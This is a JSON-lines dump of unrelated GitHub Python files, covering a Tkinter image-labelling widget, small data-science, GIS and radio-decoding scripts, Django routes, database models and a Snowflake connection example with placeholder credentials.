self.bind('1', self._key_label)\n self.bind('2', self._key_label)\n self.bind('3', self._key_label)\n self.bind('j', self._key_label)\n self.bind('k', self._key_label)\n self.bind('l', self._key_label)\n self.bind('J', self._key_label)\n self.bind('K', self._key_label)\n self.bind('L', self._key_label)\n self.bind('q', self._key_axes)\n self.bind('Q', self._key_axes)\n self.bind('e', self._key_surf)\n self.bind('E', self._key_surf)\n\n @classmethod\n def _about(cls):\n mb.showinfo(title='About Batch Label Widget', message='Developed by ZZH for tip quality control')\n \n @classmethod\n def _extract_mask(cls, mask, masktype):\n if not os.path.exists(mask + masktype):\n return None\n n_skip = 0\n with open(mask + masktype, \"r\") as f:\n for line in f.readlines():\n line = line.strip()\n if line.startswith(\"#\"):\n n_skip += 1\n else:\n break\n names = [\"##n\", \"X\", \"Y\", \"Z\", \"parent\"]\n return pd.read_csv(mask + masktype, index_col=0, skiprows=n_skip, sep=\" \", usecols=[0, 2, 3, 4, 6], names=names)\n\n @classmethod\n def _extract_raw(cls, raw, rawtype):\n img = sitk.ReadImage(raw + rawtype)\n if rawtype == '.tif':\n img = sitk.Flip(img, (False, True, False))\n array = sitk.GetArrayFromImage(img)\n # if len(array.shape) == 3:\n return np.max(array, axis=0), np.max(array, axis=2), 
np.max(array, axis=1)\n # else:\n # return array, np.zeros(array.shape), np.zeros(array.shape)\n\n def _ask_filetype(self, title, types):\n pop = type_dialog(self, title, types)\n self.wait_window(pop)\n return pop._type\n \n def _check_update(self, *arg):\n self._surf_on.set(True)\n self._axes_on.set(True)\n\n def _display_on_v3d(self):\n if self._combolist_text.get() == '':\n return\n filename = os.path.join(self._dir, self._combolist_text.get())\n with open(filename + '.ano', 'w') as ano:\n ano.write('SWCFILE=' + filename + self._masktype + '\\nRAWIMG=' + filename + self._rawtype)\n ano.close()\n try:\n if self._path_v3d == '':\n raise\n os.system(self._path_v3d + ' \"' + ano.name + '\"')\n except:\n try:\n os.system('vaa3d \"' + ano.name + '\"')\n except:\n try:\n os.system('vaa3d_msvc \"' + ano.name + '\"')\n except:\n mb.showerror(title='Vaa3D Not Found', message=\"Vaa3D executable isn't found in either the environment or the path specified.\\n\"\n \"Please specify a proper path or add an environment path directing to an executable with a proper name.\"\n )\n os.remove(ano.name)\n\n def _judge(self):\n self._cache[self._combolist_text.get()]['label'] = self._radio_var.get()\n\n def _key_axes(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n self._axes_on.set(not self._axes_on.get())\n\n def _key_label(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n if event.keysym in ('1', 'j', 'J'):\n self._radio_var.set('y')\n elif event.keysym in ('2', 'k', 'K'):\n self._radio_var.set('n')\n else:\n self._radio_var.set('na')\n self._judge()\n\n def _key_open(self, event):\n if event.state & 1 == 0:\n self._open_dir()\n\n def _key_save(self, event):\n if event.state & 1 == 0 or \\\n len(self._cache) == 0:\n self._save_as()\n\n def _key_surf(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n self._surf_on.set(not self._surf_on.get())\n\n def _key_v3d(self, event):\n if event.state & 1 == 0 or \\\n len(self._cache) == 0:\n self._display_on_v3d()\n \n def _key_switch(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0 or \\\n event.widget is self._combolist or \\\n type(event.widget) == str and 'combobox' in event.wdiget:\n return\n if event.keysym in ('Up', 'w', 'W'):\n self._switch(-1)\n else:\n self._switch(1)\n\n def _key_turn_plane(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n if event.keysym in ('Right', 'd', 'D'):\n if self._btn_value != 'XZ':\n self._turn_plane(self._no_to_plane[min(self._plane_to_no[self._btn_value] + 1, 2)]\n )\n else:\n if self._btn_value != 'XY':\n self._turn_plane(self._no_to_plane[max(self._plane_to_no[self._btn_value] - 1, 0)]\n )\n\n def _lf_btn_update(self, *arg):\n if self._combolist.current() == 0:\n self._btn['left'].state(['disabled'])\n else:\n self._btn['left'].state(['!disabled'])\n if self._combolist.current() == len(self._cache) - 1:\n self._btn['right'].state(['disabled'])\n else:\n self._btn['right'].state(['!disabled'])\n\n def _load_files(self, dir, rawtype, masktype):\n pop = progress_popup(self, 'Loading from ' + dir + '..')\n lock.acquire()\n if not pop._flag:\n return None\n cache = {i.replace(rawtype,''): dict.fromkeys(('XY','YZ','XZ','mask','label')) \n for i in os.listdir(dir) if i.endswith(rawtype)\n }\n pop.maximum(len(cache) + 1)\n lock.release()\n for i, j in cache.items():\n lock.acquire()\n if not pop._flag:\n return None\n j['XY'], j['YZ'], j['XZ'] = BLW._extract_raw(os.path.join(dir, i), 
rawtype)\n j['mask'] = BLW._extract_mask(os.path.join(dir, i), masktype)\n j['label'] = ''\n pop.step()\n lock.release()\n lock.acquire()\n if not pop._flag:\n return None\n pop.destroy()\n lock.release()\n return cache\n\n def _open_dir(self):\n temp = fd.askdirectory(title='Open a Directory..', mustexist=True)\n if type(temp) != str or temp == '' or len(self._cache) != 0 and \\\n not mb.askokcancel(title='Continue?', message='Current cache will be overwritten.'):\n return\n rawtype = self._ask_filetype('raw image type', ('.tif', '.nrrd'))\n if rawtype is None:\n return\n masktype = self._ask_filetype('mask type', ('.eswc', '.swc'))\n if rawtype is None:\n return\n cache = self._load_files(temp, rawtype, masktype)\n if cache is None:\n return\n self._combolist['values'] = tuple(cache.keys())\n self._combolist.set('')\n self._dir = temp\n self._cache = cache\n if len(cache) > 0:\n self._rawtype = rawtype\n self._masktype = masktype\n self._refresh_controls('normal')\n self._combolist.current(0)\n self._lf_btn_update()\n else:\n self._refresh_controls('disabled')\n self._pic_handle = None\n\n def _radio_update(self, *arg):\n if self._combolist_text.get() != '':\n self._radio_var.set(self._cache[self._combolist_text.get()]['label'])\n\n def _refresh_controls(self, flag):\n self._btn['XY']['state'] = flag\n self._btn['YZ']['state'] = flag\n self._btn['XZ']['state'] = flag\n self._btn['left']['state'] = flag\n self._btn['right']['state'] = flag\n self._btn['save']['state'] = flag\n self._radio['n']['state'] = flag\n self._radio['na']['state'] = flag\n self._radio['y']['state'] = flag\n self._check_surf['state'] = flag\n self._check_axes['state'] = flag\n self._menu['file'].entryconfig(1, state=flag)\n self._menu['tool'].entryconfig(1, state=flag)\n self._btn[self._btn_value].state(['pressed', 'disabled'])\n\n def _repaint(self, *arg):\n self._view.delete('all')\n if self._combolist_text.get() == '':\n return\n raw = self._cache[self._combolist_text.get()]\n temp = Image.fromarray(raw[self._btn_value])\n view_w, view_h = self._view.winfo_width(), self._view.winfo_height()\n bias_center = view_w // 2, \\\n view_h // 2\n ratio = min(view_w / temp.height, \n view_h / temp.width\n )\n paint_size = int(temp.width*ratio), int(temp.height*ratio)\n self._pic_handle = ImageTk.PhotoImage(temp.resize(size=paint_size, resample=Image.BICUBIC)\n )\n self._view.create_image(*bias_center, \n image=self._pic_handle, \n tag='img'\n )\n bias_tl = bias_center[0] - paint_size[0] // 2, \\\n bias_center[1] - paint_size[1] // 2\n if self._axes_on.get():\n self._view.create_line(bias_tl[0], \n bias_center[1], \n bias_tl[0] + paint_size[0], \n bias_center[1], \n fill=BLW._axis_color[self._btn_value[0]], \n width=1, \n arrow='last', \n arrowshape='%d %d %d'%(paint_size[0]//200, paint_size[0]//100, paint_size[0]//200), \n dash=1, \n tag='axis'\n )\n self._view.create_text(bias_tl[0] + paint_size[0], \n bias_center[1], \n text=self._btn_value[0], \n anchor='ne', \n fill='white', \n font=('Arial', max(min(paint_size[0]//40, 15), 10)), \n tag='axis'\n )\n self._view.create_line(bias_center[0], \n bias_tl[1], \n bias_center[0], \n bias_tl[1] + paint_size[1], \n fill=BLW._axis_color[self._btn_value[1]], \n width=1, \n arrow='last', \n arrowshape='%d %d %d'%(paint_size[0]//200, paint_size[0]//100, paint_size[0]//200), \n dash=1, \n tag='axis'\n )\n self._view.create_text(bias_center[0], \n bias_tl[1] + paint_size[1], \n text=self._btn_value[1], \n anchor='se', \n fill='white', \n font=('Arial', max(min(paint_size[0] // 40, 15), 
10)), \n tag='axis'\n )\n if raw['mask'] is not None and self._surf_on.get():\n for index, row in raw['mask'].iterrows():\n if row['parent'] in raw['mask'].index:\n self._view.create_line(*tuple([int(ratio * i + j) \n for i, j in zip(row[list(self._btn_value)], bias_tl)\n ]),\n *tuple([int(ratio * i + j) \n for i, j in zip(raw['mask'].loc[row['parent'], list(self._btn_value)], bias_tl)\n ]), \n fill='#fb0', \n width=2, \n tag='mask'\n )\n self._view.create_text(bias_tl, \n text='#%d' % (self._combolist.current()+1), \n fill='white', \n anchor='nw'\n )\n self._repaint_label()\n\n def _repaint_label(self, *arg):\n if len(self._cache) == 0 or self._pic_handle == None:\n return\n self._view.delete('label')\n length = self._pic_handle.width() // 10\n pad = self._pic_handle.width() // 100\n anchor = (self._view.winfo_width() + self._pic_handle.width()) // 2\n if self._radio_var.get() == 'y':\n self._view.create_line(anchor - pad - length, \n pad + length // 2, \n anchor - pad, \n pad + length // 2, \n fill='#0f0', \n tag='label', \n width = pad\n )\n self._view.create_line(anchor - pad - length // 2, \n pad, \n anchor - pad - length // 2, \n pad + length, \n fill='#0f0', \n tag='label', \n width = pad\n )\n elif self._radio_var.get() == 'n':\n self._view.create_line(anchor - pad - length, \n pad + length // 2, \n anchor - pad, \n pad + length // 2, \n fill='#f00', \n tag='label', \n width = pad\n )\n elif self._radio_var.get() == 'na':\n self._view.create_text(anchor - pad, \n -pad, \n text='?', \n anchor='ne', \n font=('Arial', length), \n fill='#ff0', \n tag='label'\n )\n\n def _save_as(self):\n if len(self._cache) == 0:\n return\n path = fd.asksaveasfilename(title='Save Labels As..', \n filetypes=[('CSV file ', '*.csv'), \n ('Excel file', '*.xls;*.xlsx')], \n defaultextension='*.*'\n )\n if type(path) != str or path == '':\n return\n df = pd.DataFrame(np.array([(i, j['label']) \n for i, j in self._cache.items()\n ]), \n columns=['filename', 'label']\n ).set_index('filename')\n if path.endswith('.csv'):\n df.to_csv(path, sep=',')\n elif path.endswith('.xls') or path.endswith('.xlsx'):\n df.to_excel(path)\n\n def _scroll(self, event):\n if len(self._cache) == 0 or \\\n event.widget is self._combolist or \\\n type(event.widget) == str and 'combobox' in event.widget:\n return\n elif event.num == 4 or event.delta == 120:\n self._switch(-1)\n else:\n self._switch(1)\n self._lf_btn_update()\n self._radio_update()\n\n def _set_v3d_path(self):\n temp = fd.askopenfilename(title='Input the Path to a Vaa3D Executable..', initialdir=self._path_v3d)\n if type(temp) != str or temp == '':\n return\n self._path_v3d = temp\n\n def _switch(self, direction):\n if 0 <= self._combolist.current() + direction < len(self._cache):\n self._turn_plane('XY')\n self._combolist.current(min(max(self._combolist.current() + direction, 0), \n len(self._cache) - 1\n )\n )\n self._lf_btn_update()\n self._radio_update()\n\n def _turn_plane(self, plane):\n self._btn_value = plane\n self._btn['XY'].state(['!pressed', '!disabled'])\n self._btn['YZ'].state(['!pressed', '!disabled'])\n self._btn['XZ'].state(['!pressed', '!disabled'])\n self._btn[plane].state(['pressed', 'disabled'])\n self._repaint()\n\nif __name__ == \"__main__\":\n app = BLW()\n app.mainloop()","repo_name":"zzhmark/tip_label_widget","sub_path":"tip_label_widget_class.py","file_name":"tip_label_widget_class.py","file_ext":"py","file_size_in_byte":34258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} 
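The `_extract_raw` helper in the record above collapses a 3-D image stack into three maximum-intensity projections, one per viewing plane, by taking `np.max` along each axis in turn. A minimal, self-contained sketch of that projection step (the synthetic volume and its shape are illustrative assumptions; the SimpleITK loading and `.tif` flip from the record are omitted):

import numpy as np

def mips(volume):
    # volume is a (Z, Y, X) stack, the layout sitk.GetArrayFromImage returns;
    # a max over one axis collapses the stack into a 2-D projection.
    xy = np.max(volume, axis=0)  # collapse Z -> (Y, X): the XY view
    yz = np.max(volume, axis=2)  # collapse X -> (Z, Y): the YZ view
    xz = np.max(volume, axis=1)  # collapse Y -> (Z, X): the XZ view
    return xy, yz, xz

vol = np.random.randint(0, 255, size=(8, 64, 64), dtype=np.uint8)  # synthetic stack
for name, proj in zip(('XY', 'YZ', 'XZ'), mips(vol)):
    print(name, proj.shape)

The return order (XY, YZ, XZ) mirrors the tuple `_extract_raw` stores under the `XY`/`YZ`/`XZ` cache keys in `_load_files`.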
+{"seq_id":"30149897811","text":"def solve(n,k,word):\n cur_best = word[0] * k\n for i in range(2,n+1):\n new_word = (word[:i]* (k//i + 1)) [:k]\n if new_word <= cur_best:\n cur_best = new_word\n if new_word[:i] < cur_best[:i]:\n break\n return cur_best\nimport io\nimport os\n# import time\n# a=time.time()\nif __name__ == \"__main__\":\n input = io.BytesIO(os.read(0, os.fstat(0).st_size)).readline\n n,k = [int(x) for x in input().decode().strip().split(\" \")]\n word = input().decode().strip()\n res = solve(n,k,word)\n print(res)\n\n","repo_name":"jano31415/codejam","sub_path":"codeforces/726_round_div2/probe.py","file_name":"probe.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36856019293","text":"import cv2 as cv \r\nimport matplotlib.pyplot as plt \r\n\r\nimport numpy as np\r\nimport sys\r\n\r\ndef rect(index):\r\n\tdef box(x, y):\r\n\t\treturn index[x][y] and index[x-1][y-1] and index[x-1][y] \\\r\n\t\tand index[x][y-1] and index[x][y+1] and index[x+1][y-1] and index[x+1][y] and index[x+1][y+1]\r\n\t\t\r\n\trow, col = index.shape \r\n\tlr = [row, col]\r\n\tbx = [0, 0]\r\n\t\r\n\tfor x in range(1, row-1):\r\n\t\tfor y in range(1, col-1):\r\n\t\t\tif box(x, y):\r\n\t\t\t\tif x < lr[0]:\r\n\t\t\t\t\tlr[0] = x \r\n\t\t\t\tif y < lr[1]:\r\n\t\t\t\t\tlr[1] = y \r\n\t\t\t\tif x > bx[0]:\r\n\t\t\t\t\tbx[0] = x \r\n\t\t\t\tif y > bx[1]:\r\n\t\t\t\t\tbx [1] = y \r\n\treturn lr, bx \r\n\t\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) != 3:\r\n\t\tprint(\"usage: python extract.py srcImg, dstImg\")\r\n\t\texit(-1)\r\n\t\r\n\tsrcpath = sys.argv[1]\r\n\tdstpath = sys.argv[2]\r\n\t\r\n\tsrcImage = cv.imread(srcpath)\r\n\tif srcImage == np.array([]):\r\n\t\tprint(\" no file \"+srcImg)\r\n\t\texit(-1)\r\n\t\r\n\t#cv.imshow(\"src\", srcImage)\r\n\r\n\thsv = cv.cvtColor(srcImage, cv.COLOR_BGR2HSV)\r\n\r\n\r\n\tth = cv.inRange(hsv, (0, 90, 90), (150, 220, 220))\r\n\r\n\r\n\r\n\tindex = th==255\r\n\r\n\tlr, bx = rect(index)\r\n\r\n\tdstImage = np.zeros((bx[0]-lr[0]+1, bx[1]-lr[1]+1, 3), np.uint8)\r\n\tfor x in range(lr[0], bx[0]):\r\n\t\tfor y in range(lr[1], bx[1]):\r\n\t\t\tdstImage[x-lr[0]][y-lr[1]] = srcImage[x][y]\r\n\r\n#dstImage[:, :] = (255,255,255)\r\n\r\n#dstImage[index] = srcImage[index]\r\n\r\n# cv.imshow(\"dst\", dstImage)\r\n\r\n#print(dstImage.shape)\r\n\r\n\tcv.imwrite(dstpath, dstImage)\r\n\r\n#cv.waitKey(0)\r\n\r\n\tplt.imshow(dstImage)\r\n\tplt.show()\r\n\r\n","repo_name":"sebuaa2019/Team109","sub_path":"RobotSrc/grab_109/src/extractTempl/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"39768805095","text":"import numpy\nimport pmt\nimport math\nimport struct\nimport time\nfrom gnuradio import gr\nfrom gnuradio import qtgui\n\nfrom PyQt5.QtWidgets import QFrame, QHBoxLayout, QVBoxLayout, QGridLayout, QLabel\nfrom PyQt5.QtGui import QPainter, QBrush, QColor, QPen, QFontMetricsF\nfrom PyQt5.QtCore import Qt as Qtc\nfrom PyQt5.QtCore import QRect\n\nclass DataEvent(object):\n msg_counter = 0\n last_received = round(time.time() * 1000)\n \n def __init__(self, data_b, meta_data_b):\n data = \"\".join(map(lambda n: \"{0:08b}\".format(n), data_b))\n\n self.data = data\n self.meta_data = meta_data_b\n\n temp = int(data[12:24], 2)\n if int(data[12]):\n temp = -1 * (math.pow(2,12) - temp)\n\n self.temp = str(temp / 10.0) \n self.chn = \"--\" \n\n if 
data[10:12] == \"00\":\n            self.chn = \"1\"\n        elif data[10:12] == \"01\" :\n            self.chn = \"2\"\n        elif data[10:12] == \"10\":\n            self.chn = \"3\"\n\n        if DataEvent.check_crc(data[0:24], data[24:32]):\n            self.crc = \"OK\"\n        else:\n            self.crc = \"BAD\"\n\n        if data[9] == \"0\":\n            self.auto_tx = 'Yes'\n        else:\n            self.auto_tx = 'No'\n\n        if meta_data_b is not None and len(meta_data_b) == 24:\n            self.signal_length = \"%d\" % struct.unpack('L', meta_data_b[0:8])\n            self.pulse_length = \"%d\" % struct.unpack('L', meta_data_b[8:16])\n            self.signal_length_ms = \"%.3f ms\" % (struct.unpack('f', meta_data_b[16:20])[0] * 1000.0)\n            self.pulse_length_ms = \"%.3f ms\" % (struct.unpack('f', meta_data_b[20:24])[0] * 1000.0)\n        else:\n            self.signal_length = \"--\"\n            self.pulse_length = \"--\"\n            self.signal_length_ms = \"--\"\n            self.pulse_length_ms = \"--\"\n\n        if DataEvent.last_received < (round(time.time() * 1000) - 1000):\n            DataEvent.msg_counter = 1\n        else:\n            DataEvent.msg_counter += 1\n\n        DataEvent.last_received = (round(time.time() * 1000))\n\n    @staticmethod\n    def check_crc(data, crc_check, div = '100110001'): \n        i=0\n        crc=[0] * 8 \n        \n        data_a = [int(c) for c in data] + ['0'] * 8 \n        \n        while i/', news_view.NewsDetailView.as_view()),\n    \n    # ? about\n    path('about', info_view.AboutListView.as_view()),\n    path('about/<int:pk>/', info_view.AboutDetailView.as_view()),\n    \n    # ? fanfic rool\n    path('fanfic-rool', info_view.FanficRoolListView.as_view()),\n    path('fanfic-rool/<int:pk>/', info_view.FanficRoolDetailView.as_view()),\n    \n    # ? faq\n    path('faq', info_view.FaqListCreateAPIView.as_view()),\n    path('faq/<int:pk>/', info_view.FaqDetailView.as_view()),\n    \n    # ? private policy\n    path('private-policy', info_view.PrivatyPoliceListView.as_view()),\n    path('private-policy/<int:pk>', info_view.PrivatyPoliceDetailView.as_view()),\n]","repo_name":"audiowide/ficcraft","sub_path":"back/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10809881792","text":"import snowflake.connector\nimport sys\nimport time\nimport xlrd\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom snowflake.sqlalchemy import URL\n\n#using snowflake connector\ndef connect_snowflake():\n    try:\n        start = time.time()\n        ctx = snowflake.connector.connect(\n            user = \"snowflake_user\",\n            password = \"password\",\n            account = \"snowflake_account\",\n            database = \"snowflake_database\",\n            warehouse = \"warehouse\",\n            schema = \"schema_name\",\n        )\n        return ctx\n    except Exception as e:\n        print(\"[SNOWFLAKE ERROR] - Unable to connect to snowflake\")\n        print(e)\n        sys.exit(1)\n        \nctx = connect_snowflake()\ncs = ctx.cursor()\ncount = cs.execute(\"select count(*) from table_name\")\ncs.execute(\"commit\")\ncs.close()\nctx.close()\n\n#another method using sqlalchemy\nengine = create_engine(URL(\n    account = \"snowflake_account\",\n    user = \"snowflake_user\",\n    password = \"password\",\n    database = \"snowflake_database\",\n    schema = \"schema_name\",\n    warehouse = \"warehouse\",\n))\n\ntry:\n    connection = engine.connect()\n    df = pd.read_excel(filename, sheet_name=\"Sheet1\")\n    #chose select columns in DF and also rearrange\n    df1 = df.iloc[:,[1,5,4,8,9]]\n    #mass insert entire dataframe to snowflake table. 
if table already exists, ensure column names match with headers in DF\n df1.to_sql(name='TABLE_NAME', con=connection, schema='schema_name', if_exists='append', index=False)\nfinally:\n connection.close()\n engine.dispose()\n","repo_name":"kinipranav/PySnippets","sub_path":"snowflakeConnector.py","file_name":"snowflakeConnector.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73889680792","text":"from bases.util import type_checking\n\n\nclass RenderError(Exception):\n pass\n\n\nclass BaseToken(object):\n def sub(self, index: int) -> str:\n raise NotImplementedError\n\n def __str__(self) -> str:\n raise NotImplementedError\n\n\nclass Token(BaseToken):\n def sub(self, index: int) -> str:\n raise RenderError\n\n\nclass Function(Token):\n @type_checking\n def sub(self, index: int) -> str:\n raise RenderError\n\n\nclass Operator(BaseToken):\n operator = None # type: str\n precedence = -1 # type: int\n\n @type_checking\n def sub(self, index: int) -> str:\n raise RenderError\n\n\nclass UnaryOp(Operator):\n a = None # type: BaseToken\n\n @type_checking\n def sub(self, index: int) -> str:\n if index not in [0]:\n raise RenderError\n return r'{}'.format(self.a)\n\n @type_checking\n def __str__(self) -> str:\n return r'{}'.format(self.a)\n\n\nclass BinaryOp(Operator):\n a = None # type: BaseToken\n b = None # type: BaseToken\n\n associate = -1 # type: int\n\n @type_checking\n def __str__(self) -> str:\n return r'{} {} {}'.format(self.sub(0), self.operator, self.sub(1))\n\n @type_checking\n def sub(self, index: int) -> str:\n child = [self.a, self.b][index]\n\n if isinstance(child, Operator):\n if child.precedence < self.precedence:\n return r'({})'.format(child)\n if isinstance(child, BinaryOp) and child.precedence == self.precedence:\n if self.associate != index:\n return r'({})'.format(child)\n elif index == 0 and isinstance(child, Function):\n return r'({})'.format(child)\n return r'{}'.format(child)\n\n\nclass TrinaryOp(Operator):\n a = None # type: BaseToken\n b = None # type: BaseToken\n c = None # type: BaseToken\n\n @type_checking\n def __str__(self) -> str:\n return r'{} {} {} {} {} {}'.format(\n self.operator[0], self.sub(0),\n self.operator[1], self.sub(1),\n self.operator[2], self.sub(2))\n\n @type_checking\n def sub(self, index: int) -> str:\n return r'{}'.format([self.a, self.b, self.c][index])\n","repo_name":"speedcell4/CoPL-Py","sub_path":"bases/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26217534758","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import Column, types, ForeignKey\n\nfrom .gtfsbase import GTFSBase\nfrom ..base import Base\nfrom ..mixins import ToJSONMixin, Versioned\n\n\nclass BuildTypes:\n INITIAL_TIMES = 'initial_times'\n FREQUENCY = 'frequency'\n\n\nclass Route(Base, ToJSONMixin, Versioned, GTFSBase):\n __tablename__ = 'routes'\n\n route_id = Column(types.Integer, primary_key=True)\n agency_id = Column(types.Integer, ForeignKey(\"agency.agency_id\",\n onupdate=\"CASCADE\",\n ondelete=\"SET NULL\"))\n route_short_name = Column(types.Text())\n route_long_name = Column(types.String(150))\n route_desc = Column(types.String(150))\n route_type = Column(types.String(50))\n route_color = Column(types.String(50))\n build_type = Column(types.String(50), default=BuildTypes.INITIAL_TIMES)\n route_text_color 
= Column(types.String(50))\n active = Column(types.Boolean, default=False)\n","repo_name":"avilaton/gtfseditor","sub_path":"app/models/gtfs/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"5"} +{"seq_id":"9176344407","text":"import numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras import applications\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport os\n\nimport tensorflow as tf\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\nbatch_size = 20\nepochs = 50\nmonkey_VGG_path = \"monkey_vgg_weighs.h5\"\n\ntrain_data = np.load(\"monkey_feature_train.npy\")\ntrain_labels = np.array([])\nfor i in range(10):\n labels = [i] * 104\n train_labels = np.append(train_labels, labels)\n\ntrain_labels = to_categorical(train_labels)\n\nvalidation_data = np.load(\"monkey_feature_validation.npy\")\nvalidation_labels = np.array([])\nfor i in range(10):\n labels = [i] * 26\n validation_labels = np.append(validation_labels, labels)\n\nvalidation_labels = to_categorical(validation_labels)\n\nmodel = Sequential()\nmodel.add(Flatten(input_shape=train_data.shape[1:]))\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy', metrics=['accuracy'])\n\nhistory = model.fit(train_data, train_labels,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=(validation_data, validation_labels))\nmodel.save_weights(monkey_VGG_path)\n\n# summarize history for accuracy\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()","repo_name":"xyzhu68/deeplearning","sub_path":"VGG16/train_monkey_features.py","file_name":"train_monkey_features.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4278416529","text":"# Importing the libraries\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.autograd import Variable\n\nimport PsicoAnalisis\ncandidatos,matriz = PsicoAnalisis.formatear(('files/Psychometrics.csv'))\n\n\nnb_users = len(matriz)\nnb_candidate = len(matriz[0])\n\n# Feature Scaling\nfrom sklearn.preprocessing import MinMaxScaler\nsc = MinMaxScaler(feature_range = (0, 1))\nmatrizTrain = sc.fit_transform(matriz)\n\n\n# Converting the data into Torch tensors\ntraining_set = torch.FloatTensor(matrizTrain)\n\n# Creating the architecture of the Neural Network\nclass SAE(nn.Module):\n def __init__(self, ):\n super(SAE, self).__init__()\n self.fc1 = nn.Linear(nb_candidate, 10)\n self.fc2 = nn.Linear(10, 5)\n self.fc3 = nn.Linear(5, 10)\n self.fc4 = nn.Linear(10, nb_candidate)\n self.activation = nn.Sigmoid()\n def forward(self, x):\n x = self.activation(self.fc1(x))\n x = self.activation(self.fc2(x))\n x = 
self.activation(self.fc3(x))\n        x = self.fc4(x)\n        return x\nsae = SAE()\n\ncriterion = nn.MSELoss()\noptimizer = optim.RMSprop(sae.parameters(), lr = 0.01, weight_decay = 0.5)\n\n# Training the SAE\nnb_epoch = 50\n\nfor epoch in range(1, nb_epoch + 1):\n    train_loss = 0\n    s = 0.\n    for id_user in range(nb_users):\n        input = Variable(training_set[id_user]).unsqueeze(0)\n        target = input.clone()\n        if torch.sum(target.data > 0) > 0:\n            output = sae(input)\n            target.require_grad = False\n            output[target == 0] = 0\n            loss = criterion(output, target)\n            mean_corrector = nb_candidate/float(torch.sum(target.data > 0) + 1e-10)\n            loss.backward()\n            train_loss += np.sqrt(loss.data*mean_corrector)\n            s += 1.\n            optimizer.step()\n    print('train loss: '+str(train_loss/s))\n\n    \noutputgroup = []\nfor userd_id in range (nb_users):\n    user_input = Variable(training_set[userd_id])\n    ouput = sae(user_input)\n    output = ouput.data.numpy()\n    n_max = max(output)\n    outputScaling = np.zeros(len(output))\n    for i in range (0, len(output)):\n        outputScaling[i] = outputScaling[i] + output[i]*(1/n_max)\n    \n    outputgroup.append(outputScaling)\n\ndef predict(candidatesPath, psytestPath):\n    Apruba = np.zeros(nb_users)\n    for i in range (len(psytestPath)):\n        if (psytestPath[i][0]>= 0.5):\n            Apruba[i] += 1 \n    \n    return Apruba\n\nApruba = predict(candidatos, outputgroup)\nprint(Apruba)\n","repo_name":"topassky/hackaton2020","sub_path":"Reto3.py","file_name":"Reto3.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26962191223","text":"import glob\n\nimport gpxpy\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nimport numpy as np\n\nplt.figure(dpi=800)\n# Using resolution='i' for faster runtime. Dealing with the mapping is food for \n# thought, because it's really wasteful to draw the full earth just to look at \n# a 30 km radius.\nm = Basemap(llcrnrlon=24.65 ,llcrnrlat=60.125, urcrnrlon=25.1, urcrnrlat=60.3, projection='merc', resolution='i')\nm.drawcoastlines(linewidth=0.01)\nm.fillcontinents(color='#202020',lake_color='w')\n\n# Read tracks from dir containing all tracks desired to be plotted\ntrack_files = glob.glob(\"tracks/*.GPX\")\ntracks = []\nfor f in track_files:\n    with open(f, 'r') as gpx_file:\n        gpx = gpxpy.parse(gpx_file)\n        for track in gpx.tracks:\n            t = []\n            for segment in track.segments:\n                for point in segment.points:\n                    t.append((point.latitude, point.longitude))\n            tracks.append(t)\n    \nfor track in tracks:\n    y, x = zip(*track)\n    cs = m.plot(x, y, c='aqua', linewidth=0.1, latlon=True)\n\nplt.savefig('running.png')\n","repo_name":"aHertsberg/track-heatmap","sub_path":"plot_heatmap.py","file_name":"plot_heatmap.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24194789259","text":"\"\"\"\nRECURSION\n\nRecursion 